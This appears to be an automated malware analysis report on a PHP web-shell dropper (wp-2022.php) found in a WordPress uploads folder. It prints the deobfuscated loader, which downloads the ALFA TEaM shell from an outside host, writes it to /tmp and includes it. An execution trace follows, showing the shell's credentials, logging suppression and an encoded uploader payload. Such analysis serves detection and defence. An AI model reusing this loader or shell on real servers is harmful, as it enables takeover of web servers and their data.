PHP Malware Analysis

wp-2022.php, wp-2022.php.jpg

md5: 0eebffcade2a2a9076837f7425362205

Jump to:

Screenshot


Attributes

Encoding

Environment

Execution

Input

Title
  • ..:: localhost ~ ALFA TEaM Shell - v4.1-Tesla ::.. (HTML)

URLs
  • ftp.example.com (HTML)
  • http://solevisible.com/icons/ (HTML)
  • http://solevisible.com/icons/back.png (HTML)
  • http://solevisible.com/icons/folder.png (HTML)
  • http://solevisible.com/icons/jpg.png (HTML)
  • http://solevisible.com/icons/menu/ (HTML)
  • http://solevisible.com/icons/menu/b_minus.png (HTML)
  • http://solevisible.com/icons/menu/b_plus.png (HTML)
  • http://solevisible.com/icons/menu/check-mark1.svg (HTML)
  • http://solevisible.com/icons/menu/copy.svg (HTML)
  • http://solevisible.com/icons/menu/delete.svg (HTML)
  • http://solevisible.com/icons/menu/download2.svg (HTML)
  • http://solevisible.com/icons/menu/edit.svg (HTML)
  • http://solevisible.com/icons/menu/folder2.svg (HTML)
  • http://solevisible.com/icons/menu/increase.svg (HTML)
  • http://solevisible.com/icons/menu/key.svg (HTML)
  • http://solevisible.com/icons/menu/link.svg (HTML)
  • http://solevisible.com/icons/menu/move.svg (HTML)
  • http://solevisible.com/icons/menu/newtab.svg (HTML)
  • http://solevisible.com/icons/menu/rename.svg (HTML)
  • http://solevisible.com/icons/menu/resize.svg (HTML)
  • http://solevisible.com/icons/menu/terminal.svg (HTML)
  • http://solevisible.com/icons/menu/time.svg (HTML)
  • http://solevisible.com/icons/menu/time2.svg (HTML)
  • http://solevisible.com/icons/menu/view.svg (HTML)
  • http://solevisible.com/icons/menu/warning.svg (HTML)
  • http://solevisible.com/icons/notfound.png (HTML)
  • http://solevisible.com/images/alfa-iran.png (HTML)
  • http://solevisible.com/images/alfabg.png (HTML)
  • http://solevisible.com/images/alfamini.png (HTML, Traces)
  • http://solevisible.com/images/btn.png (HTML, Traces)
  • http://solevisible.com/images/flags/48/ (HTML)
  • http://solevisible.com/images/loader.svg (HTML, Traces)
  • http://www.w3.org/1999/xhtml (HTML)
  • https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js (HTML)
  • https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js (HTML)
  • https://shell.prinsh.com/Nathan/alfa.txt (Deobfuscated, Original, Traces)
  • https://t.me/solevisible (HTML)
  • https://telegram.me/solevisible (HTML)


Deobfuscated PHP code

 <?php 
$data = ['https://shell.prinsh.com/Nathan/alfa.txt', '/tmp/sesss_' . md5($_SERVER['HTTP_HOST']) . '.php'];
if (file_exists($data[1]) && filesize($data[1]) !== 0) {
    include $data[1];
} else {
    $fopen = fopen($data[1], 'w+');
    fwrite($fopen, get($data[0]));
    fclose($fopen);
    echo "<script>window.location=\"?zet\";</script>";
}
function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    return curl_exec($ch);
}

Execution traces

data/traces/0eebffcade2a2a9076837f7425362205_trace-1676254204.4879.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:10:30.385784]
1	0	1	0.000202	393528
1	3	0	0.000297	399800	{main}	1		/var/www/html/uploads/wp-2022.php	0	0
2	4	0	0.000317	400176	md5	0		/var/www/html/uploads/wp-2022.php	2	1	'localhost'
2	4	1	0.000334	400272
2	4	R			'421aa90e079fa326b6494f812ad13e79'
1		A						/var/www/html/uploads/wp-2022.php	2	$data = [0 => 'https://shell.prinsh.com/Nathan/alfa.txt', 1 => '/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php']
2	5	0	0.000369	400256	file_exists	0		/var/www/html/uploads/wp-2022.php	4	1	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
2	5	1	0.000392	400296
2	5	R			TRUE
2	6	0	0.000407	400256	filesize	0		/var/www/html/uploads/wp-2022.php	4	1	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
2	6	1	0.000424	400344
2	6	R			463792
2	7	0	0.000491	402680	include	1	/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	/var/www/html/uploads/wp-2022.php	5	0
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	9	GLOBALS['oZgNypoPRU'] = ['username' => 'alfa', 'password' => 'a6f452ec3293d7fb72c5b677257b20ec', 'safe_mode' => '0', 'login_page' => '403', 'show_icons' => '1', 'post_encryption' => FALSE, 'cgi_api' => TRUE]
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	19	$CWppUDJxuf = 'function_exists'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	20	$aztJtafUXm = 'charCodeAt'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	21	$OVpGNqqFZs = 'eval'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	22	$psDEwGhsxg = 'gzinflate'
3	8	0	0.000585	402680	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	24	1	'base64_encode'
3	8	1	0.000599	402720
3	8	R			TRUE
3	9	0	0.000614	402680	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	72	1	'base64_decode'
3	9	1	0.000627	402720
3	9	R			TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	126	GLOBALS['DB_NAME'] = ['username' => 'alfa', 'password' => 'a6f452ec3293d7fb72c5b677257b20ec', 'safe_mode' => '0', 'login_page' => '403', 'show_icons' => '1', 'post_encryption' => FALSE, 'cgi_api' => TRUE]
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'username'
3	10	0	0.000675	402656	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'username'	0	2
3	10	1	0.000690	402784
3	10	R			'us'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'us'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	133	GLOBALS['DB_NAME']['user'] = 'alfa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	134	GLOBALS['DB_NAME']['user_rand'] = 'username'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'password'
3	11	0	0.000754	403384	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'password'	0	2
3	11	1	0.000767	403512
3	11	R			'pa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'pa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	138	GLOBALS['DB_NAME']['pass'] = 'a6f452ec3293d7fb72c5b677257b20ec'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	139	GLOBALS['DB_NAME']['pass_rand'] = 'password'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'safe_mode'
3	12	0	0.000831	403384	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'safe_mode'	0	2
3	12	1	0.000844	403512
3	12	R			'sa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'sa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	143	GLOBALS['DB_NAME']['safemode'] = '0'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	144	GLOBALS['DB_NAME']['safemode_rand'] = 'safe_mode'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'login_page'
3	13	0	0.000905	403384	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'login_page'	0	2
3	13	1	0.000919	403512
3	13	R			'lo'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'lo'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	148	GLOBALS['DB_NAME']['login_page'] = '403'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	149	GLOBALS['DB_NAME']['login_page_rand'] = 'login_page'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'show_icons'
3	14	0	0.000985	403384	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'show_icons'	0	2
3	14	1	0.001000	403512
3	14	R			'sh'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'sh'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	153	GLOBALS['DB_NAME']['show_icons'] = '1'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	154	GLOBALS['DB_NAME']['show_icons_rand'] = 'show_icons'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'post_encryption'
3	15	0	0.001062	403384	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'post_encryption'	0	2
3	15	1	0.001075	403512
3	15	R			'po'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'po'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	158	GLOBALS['DB_NAME']['post_encryption'] = FALSE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	159	GLOBALS['DB_NAME']['post_encryption_rand'] = 'post_encryption'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'cgi_api'
3	16	0	0.001137	403384	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'cgi_api'	0	2
3	16	1	0.001151	403512
3	16	R			'cg'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'cg'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	163	GLOBALS['DB_NAME']['cgi_api'] = TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	164	GLOBALS['DB_NAME']['cgi_api_rand'] = 'cgi_api'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	172	$userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
3	17	0	0.001223	404024	implode	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	172	2	'|'	[0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
3	17	1	0.001244	404184
3	17	R			'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider'
3	18	0	0.001262	404120	preg_match	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	172	2	'/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider/i'	'python-requests/2.25.1'
3	18	1	0.001281	404184
3	18	R			0
3	19	0	0.001296	404024	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	179	2	'__ALFA_VERSION__'	'4.1'
3	19	1	0.001311	404128
3	19	R			TRUE
3	20	0	0.001324	404056	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	180	2	'__ALFA_UPDATE__'	'2'
3	20	1	0.001338	404160
3	20	R			TRUE
3	21	0	0.001350	404088	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	181	2	'__ALFA_CODE_NAME__'	'Tesla'
3	21	1	0.001365	404192
3	21	R			TRUE
3	22	0	0.001378	404120	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	182	2	'__ALFA_DATA_FOLDER__'	'ALFA_DATA'
3	22	1	0.001392	404224
3	22	R			TRUE
3	23	0	0.001405	404152	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	183	2	'__ALFA_POST_ENCRYPTION__'	FALSE
3	23	1	0.001420	404256
3	23	R			TRUE
3	24	0	0.001433	404184	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	184	2	'__ALFA_SECRET_KEY__'	''
3	24	1	0.001448	404288
3	24	R			TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	185	GLOBALS['__ALFA_COLOR__'] = ['shell_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'header_vars' => '#27979B', 'header_values' => '#67ABDF', 'header_on' => '#00FF00', 'header_off' => '#ff0000', 'header_none' => '#00FF00', 'home_shell' => '#ff0000', 'home_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'back_shell' => '#efbe73', 'back_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_pwd' => '#00FF00', 'header_pwd:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_drive' => '#00FF00', 'header_drive:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_show_all' => '#00FF00', 'disable_functions' => '#ff0000', 'footer_text' => '#27979B', 'menu_options' => '#27979B', 'menu_options:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'options_list' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'options_list:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'options_list_header' => ['key_color' => '#59cc33', 'multi_selector' => [...]], 'options_list_text' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'Alfa+' => ['key_color' => '#06ff0f', 'multi_selector' => [...]], 'hidden_shell_text' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'hidden_shell_version' => '#ff0000', 'shell_name' => '#FF0000', 'main_row:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'main_header' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_name' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_size' => '#67ABDF', 'main_modify' => '#67ABDF', 'main_owner_group' => '#67ABDF', 'main_green_perm' => '#25ff00', 'main_red_perm' => '#FF0000', 'main_white_perm' => '#FFFFFF', 'beetween_perms' => '#FFFFFF', 'main_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'minimize_editor_background' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'minimize_editor_text' => ['key_color' => '#f5deb3', 'multi_selector' => [...]], 'editor_border' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'editor_background' => ['key_color' => 'rgba(0, 1, 23, 0.94)', 'multi_selector' => [...]], 'editor_header_background' => ['key_color' => 'rgba(21, 66, 88, 0.93)', 'multi_selector' => [...]], 'editor_header_text' => ['key_color' => '#00ff7f', 'multi_selector' => [...]], 'editor_header_button' => ['key_color' => '#1d5673', 'multi_selector' => [...]], 'editor_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_vars' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_values' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'editor_history_header' => ['key_color' => '#14ff07', 'multi_selector' => [...]], 'editor_history_list' => ['key_color' => '#03b3a3', 'multi_selector' => [...]], 'editor_history_selected_file' => ['key_color' => 'rgba(49, 55, 93, 0.77)', 'multi_selector' => [...]], 'editor_history_file:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'input_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'input_box_text' => ['key_color' => '#999999', 'multi_selector' => [...]], 'input_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'select_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'select_box_text' => ['key_color' => '#FFFFEE', 'multi_selector' => [...]], 'select_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button_border' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'outputs_text' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'outputs_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_background' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_text_right' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'uploader_text_left' => ['key_color' => '#25ff00', 'multi_selector' => [...]], 'uploader:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'uploader_progress_bar' => ['key_color' => '#00ff00', 'multi_selector' => [...]], 'mysql_tables' => '#00FF00', 'mysql_table_count' => '#67ABDF', 'copyright' => '#dfff00', 'scrollbar' => ['key_color' => '#1e82b5', 'multi_selector' => [...]], 'scrollbar_background' => ['key_color' => '#000115', 'multi_selector' => [...]]]
3	25	0	0.001581	404216	preg_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	511	3	'!\\(\\d+\\)\\s.*!'	''	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	25	1	0.001603	404312
3	25	R			'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	26	0	0.001620	404216	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	511	1	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	26	1	0.001634	404248
3	26	R			'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	27	0	0.001649	404216	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	511	3	'\\'	'/'	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	27	1	0.001664	404312
3	27	R			'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	511	GLOBALS['__file_path'] = '/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	512	$config = ['AlfaUser' => 'alfa', 'AlfaPass' => 'a6f452ec3293d7fb72c5b677257b20ec', 'AlfaProtectShell' => '0', 'AlfaLoginPage' => '403']
3	28	0	0.001724	404592	session_write_close	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	514	0
3	28	1	0.001739	404592
3	28	R			FALSE
3	29	0	0.001753	404592	ignore_user_abort	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	515	1	TRUE
3	29	1	0.001768	404656
3	29	R			0
3	30	0	0.001781	404624	set_time_limit	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	516	1	0
3	30	1	0.001796	404688
3	30	R			FALSE
3	31	0	0.001809	404656	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	517	2	'memory_limit'	'-1'
3	31	1	0.001825	404760
3	31	R			'128M'
3	32	0	0.001838	404656	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	518	2	'upload_max_filesize'	'9999m'
3	32	1	0.001853	404728
3	32	R			FALSE
3	33	0	0.001868	404656	error_reporting	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	853	1	32759
3	33	1	0.001881	404728
3	33	R			0
3	34	0	0.001893	404688	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	854	2	'error_log'	NULL
3	34	1	0.001908	404760
3	34	R			''
3	35	0	0.001921	404688	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	855	2	'log_errors'	0
3	35	1	0.001937	404760
3	35	R			'1'
3	36	0	0.001950	404688	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	856	2	'max_execution_time'	0
3	36	1	0.001963	404728
3	36	R			'0'
3	37	0	0.001976	404656	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	857	2	'magic_quotes_runtime'	0
3	37	1	0.001990	404728
3	37	R			FALSE
3	38	0	0.002003	404656	set_time_limit	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	858	1	0
3	38	1	0.002016	404720
3	38	R			FALSE
3	39	0	0.002029	404688	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	859	1	'set_magic_quotes_runtime'
3	39	1	0.002043	404728
3	39	R			FALSE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	875	$default_action = 'FilesMan2'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	876	$default_use_ajax = TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	877	$default_charset = 'Windows-1251'
3	40	0	0.002096	404688	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	878	3	'Linux'	0	3
3	40	1	0.002110	404816
3	40	R			'Lin'
3	41	0	0.002125	404720	strtolower	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	878	1	'Lin'
3	41	1	0.002157	404784
3	41	R			'lin'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	881	GLOBALS['sys'] = 'unix'
3	42	0	0.002193	404688	alfaGetCwd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	882	0
4	43	0	0.002207	404688	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	737	1	'getcwd'
4	43	1	0.002220	404728
4	43	R			TRUE
4	44	0	0.002233	404688	getcwd	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	738	0
4	44	1	0.002247	404736
4	44	R			'/var/www/html/uploads'
3	42	1	0.002261	404736
3	42	R			'/var/www/html/uploads'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	882	GLOBALS['home_cwd'] = '/var/www/html/uploads'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	883	GLOBALS['need_to_update_header'] = 'false'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	884	GLOBALS['glob_chdir_false'] = FALSE
3	45	0	0.002316	404736	alfaGetCwd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	890	0
4	46	0	0.002328	404736	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	737	1	'getcwd'
4	46	1	0.002345	404776
4	46	R			TRUE
4	47	0	0.002358	404736	getcwd	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	738	0
4	47	1	0.002370	404784
4	47	R			'/var/www/html/uploads'
3	45	1	0.002385	404784
3	45	R			'/var/www/html/uploads'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	890	GLOBALS['cwd'] = '/var/www/html/uploads'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	898	['cwd'] .= '/'
3	48	0	0.002426	404784	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	899	1	'sys_get_temp_dir'
3	48	1	0.002440	404824
3	48	R			TRUE
3	49	0	0.002452	404784	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	900	1	'mb_strlen'
3	49	1	0.002466	404824
3	49	R			FALSE
3	50	0	0.002479	404784	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	905	1	'mb_substr'
3	50	1	0.002492	404824
3	50	R			FALSE
3	51	0	0.002504	404784	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	1	'sys_get_temp_dir'
3	51	1	0.002517	404824
3	51	R			TRUE
3	52	0	0.002530	404784	sys_get_temp_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	0
3	52	1	0.002542	404824
3	52	R			'/tmp'
3	53	0	0.002555	404824	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	3	'\\'	'/'	'/tmp'
3	53	1	0.002570	404920
3	53	R			'/tmp'
3	54	0	0.002583	404824	is_writable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	1	'/tmp'
3	54	1	0.002600	404864
3	54	R			TRUE
3	55	0	0.002613	404792	sys_get_temp_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	0
3	55	1	0.002625	404824
3	55	R			'/tmp'
3	56	0	0.002638	404824	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	2	'ALFA_TEMPDIR'	'/tmp'
3	56	1	0.002653	404928
3	56	R			TRUE
3	57	0	0.002668	404856	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2399	1	'posix_getpwuid'
3	57	1	0.002681	404896
3	57	R			TRUE
3	58	0	0.002694	404856	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2401	1	'posix_getgrgid'
3	58	1	0.002707	404896
3	58	R			TRUE
3	59	0	0.002719	404856	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2459	1	'scandir'
3	59	1	0.002732	404896
3	59	R			TRUE
3	60	0	0.002749	404856	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6162	1	'json_encode'
3	60	1	0.002762	404896
3	60	R			TRUE
3	61	0	0.002775	404856	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6204	1	'json_decode'
3	61	1	0.002787	404896
3	61	R			TRUE
3	62	0	0.002800	404896	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6520	1	'alfaFilesMan2'
3	62	1	0.002814	404936
3	62	R			TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6521	_POST['a'] = 'FilesMan2'
3	63	0	0.002839	405272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6524	1	'alfaFilesMan2'
3	63	1	0.002853	405312
3	63	R			TRUE
3	64	0	0.002867	405232	alfaFilesMan2	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6525	0
4	65	0	0.002885	405232	alfahead	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2560	0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	912	GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250Pjwv'
5	66	0	0.002931	407024	__ZW5jb2Rlcg	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	914	1	'$x = base64_decode("PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVh'
6	67	0	0.002961	407024	vcnvSCZgBz	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	119	1	'$x = base64_decode("PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVh'
